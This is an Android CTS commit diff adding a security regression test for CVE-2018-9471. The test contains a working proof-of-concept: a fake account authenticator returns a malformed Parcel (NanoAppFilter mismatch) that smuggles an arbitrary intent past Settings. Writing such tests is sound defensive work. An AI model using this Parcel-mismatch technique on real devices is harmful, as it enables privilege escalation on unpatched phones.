[RESTRICT AUTOMERGE]: STS test for Android Security CVE-2018-9471
Test: cts-tradefed run cts -m CtsSecurityTestCases -t
android.security.cts.NanoAppBundleTest#testPoc_cve_2018_9471
Bug:113527124
Bug:77599679
Change-Id: Ia9d6ec6991593eaf4f995fe4e280b113ff03e8fb
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index a411cfd..2f402f5 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -51,6 +51,27 @@
</intent-filter>
</activity>
+ <activity
+ android:name="android.security.cts.NanoAppBundleTest$FailActivity"
+ android:label="Test Nano AppBundle customized failure catch activity">
+ <intent-filter>
+ <action android:name="android.intent.action.RUN" />
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <service
+ android:name="android.security.cts.NanoAppBundleTest$AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+
<activity android:name="android.security.cts.ActivityManagerTest$NormalActivity" />
<activity android:name="android.security.cts.ActivityManagerTest$MaliciousActivity" />
<service android:name="android.security.cts.ActivityManagerTest$AppMonitoringService" />
diff --git a/tests/tests/security/res/xml/authenticator.xml b/tests/tests/security/res/xml/authenticator.xml
new file mode 100644
index 0000000..9096201
--- /dev/null
+++ b/tests/tests/security/res/xml/authenticator.xml
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="android.security.cts"
+ android:label="AuthenticatorTest" />
\ No newline at end of file
diff --git a/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java b/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java
new file mode 100644
index 0000000..4f7dffc
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java
@@ -0,0 +1,359 @@
+/*
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.test.AndroidTestCase;
+import android.platform.test.annotations.SecurityTest;
+import androidx.test.InstrumentationRegistry;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.ContextWrapper;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.ApplicationInfo;
+
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.app.Service;
+
+import android.provider.Settings;
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.content.ServiceConnection;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.Looper;
+import android.os.Parcel;
+import android.os.Parcelable;
+import android.os.SystemClock;
+
+import android.util.Log;
+import android.annotation.Nullable;
+import static java.lang.Thread.sleep;
+import static org.junit.Assert.assertTrue;
+
+@SecurityTest
+public class NanoAppBundleTest extends AndroidTestCase {
+
+ private static final String TAG = "NanoAppBundleTest";
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+
+ private ServiceConnection mServiceConnection =
+ new ServiceConnection() {
+
+ @Override
+ public void onServiceConnected(ComponentName name, IBinder binder) {
+ Log.i(TAG, "Authenticator service " + name + " is connected");
+ }
+
+ @Override
+ public void onServiceDisconnected(ComponentName name) {
+ Log.i(TAG, "Authenticator service " + name + "died abruptly");
+ }
+ };
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ Intent serviceIntent = new Intent(mContext, AuthenticatorService.class);
+ mContext.startService(serviceIntent);
+ mContext.bindService(serviceIntent, mServiceConnection, Context.BIND_AUTO_CREATE);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ if (mContext != null) {
+ Intent serviceIntent = new Intent(mContext, AuthenticatorService.class);
+ mContext.stopService(serviceIntent);
+ }
+ super.tearDown();
+ }
+
+ /**
+ * b/113527124
+ */
+ @SecurityTest(minPatchLevel = "2018-09")
+ public void testPoc_cve_2018_9471() throws Exception {
+
+ try {
+ mContext = InstrumentationRegistry.getInstrumentation().getContext();
+ new NanoAppBundleTest.Trigger(mContext).anyAction();
+ // against vulnerable bits, the failure will get caught right after trigger.
+ // against patched bits, 1 minute wait to snap the test
+ Thread.sleep(60_000);
+ } catch(InterruptedException ignored) {
+ Log.i(TAG, "swallow interrupted exception");
+ }
+ }
+
+ public static class Trigger {
+ private static final String TAG = "Trigger";
+ private Context mContext;
+
+ public Trigger(Context context) {
+ mContext = context;
+ }
+
+ private void trigger() {
+ Log.i(TAG, "start...");
+
+ Intent intent = new Intent();
+ intent.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ intent.setAction(Intent.ACTION_RUN);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = { SECURITY_CTS_PACKAGE_NAME };
+ intent.putExtra("account_types", authTypes);
+
+ mContext.startActivity(intent);
+
+ Log.i(TAG, "finsihed.");
+ }
+
+ public void anyAction() {
+ Log.i(TAG, "Arbitrary action starts...");
+
+ Intent intent = new Intent();
+
+ intent.setComponent(new ComponentName(
+ "android.security.cts",
+ "android.security.cts.NanoAppBundleTest$FailActivity"));
+ intent.setAction(Intent.ACTION_RUN);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+
+ Authenticator.setIntent(intent);
+
+ trigger();
+
+ Log.i(TAG, "Arbitrary action finished.");
+ }
+ }
+
+ // customized activity
+ public static class FailActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle onSavedInstanceState) {
+ super.onCreate(onSavedInstanceState);
+
+ fail("Arbitrary intent executed");
+ }
+ }
+
+ //
+ // Authenticator class
+ //
+ public static class Authenticator extends AbstractAccountAuthenticator {
+
+ private static final String TAG = "Authenticator";
+
+ // mAddAccountDone : flag set to check if the buggy part is got run
+ private boolean mAddAccountDone;
+ public boolean isAddAccountDone() {
+ return mAddAccountDone;
+ }
+ public void setAddAccountDone(boolean isDone) {
+ mAddAccountDone = isDone;
+ }
+
+ // mAuthContext
+ private static Context mAuthContext;
+ public static Context getAuthContext() {
+ return mAuthContext;
+ }
+
+ // mIntent : set from Trigger or setPIN
+ private static Intent mIntent;
+ public static Intent getIntent() {
+ return mIntent;
+ }
+ public static void setIntent(Intent intent) {
+ mIntent = intent;
+ }
+
+ // Authenticator ctor
+ public Authenticator(Context context) {
+ super(context);
+ setAddAccountDone(false);
+ Authenticator.mAuthContext = context;
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse accountAuthenticatorResponse,
+ String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse accountAuthenticatorResponse,
+ Account account,
+ String authTokenType,
+ Bundle bundle) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response,
+ String accountType,
+ String authTokenType,
+ String[] requiredFeatures,
+ Bundle options) {
+ try {
+ Log.i(TAG, String.format("addAccount start...accountType = %s, authTokenType = %s",
+ accountType, authTokenType));
+ Bundle bundle = new Bundle();
+ Parcel parcel = GenMalformedParcel.nanoAppFilterParcel(mIntent);
+ bundle.readFromParcel(parcel);
+ parcel.recycle();
+ setAddAccountDone(true);
+ Log.i(TAG, "addAccount finished");
+ return bundle;
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ return null;
+ }
+
+ @Override
+ public Bundle confirmCredentials(AccountAuthenticatorResponse accountAuthenticatorResponse,
+ Account account,
+ Bundle bundle) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse accountAuthenticatorResponse,
+ Account account,
+ String authTokenType,
+ Bundle bundle) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(AccountAuthenticatorResponse accountAuthenticatorResponse,
+ Account account,
+ String[] features) {
+ return null;
+ }
+ }
+
+ //
+ // AuthenticatorService
+ //
+ public static class AuthenticatorService extends Service {
+
+ private static final String TAG = "AuthenticatorService";
+
+ private Authenticator mAuthenticator;
+ public Authenticator getAuthenticator() {
+ return mAuthenticator;
+ }
+
+ private IBinder mBinder;
+ public IBinder getServiceBinder() {
+ return mBinder;
+ }
+
+ public AuthenticatorService() {
+ }
+
+ @Override
+ public void onCreate() {
+ super.onCreate();
+ // critical:here have to pass the service context to authenticator, not mContext
+ Log.i(TAG, "creating...");
+ mAuthenticator = new Authenticator(this);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ try {
+ Log.i(TAG, "Bind starting...");
+ IBinder binder = mAuthenticator.getIBinder();
+ mBinder = binder;
+ Log.i(TAG, "Bind finished.");
+ return binder;
+ } catch (Exception e) {
+ Log.i(TAG, "Bind exception");
+ e.printStackTrace();
+ }
+ return null;
+ }
+ }
+
+ //
+ // GenMalformedParcel
+ //
+ public static class GenMalformedParcel {
+
+ public static Parcel nanoAppFilterParcel(Intent intent) {
+ Parcel data = Parcel.obtain();
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString(SECURITY_CTS_PACKAGE_NAME);
+ data.writeInt(4);
+ data.writeString("android.hardware.location.NanoAppFilter");
+ data.writeLong(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(13);
+
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(0);
+
+ return data;
+ }
+ }
+}
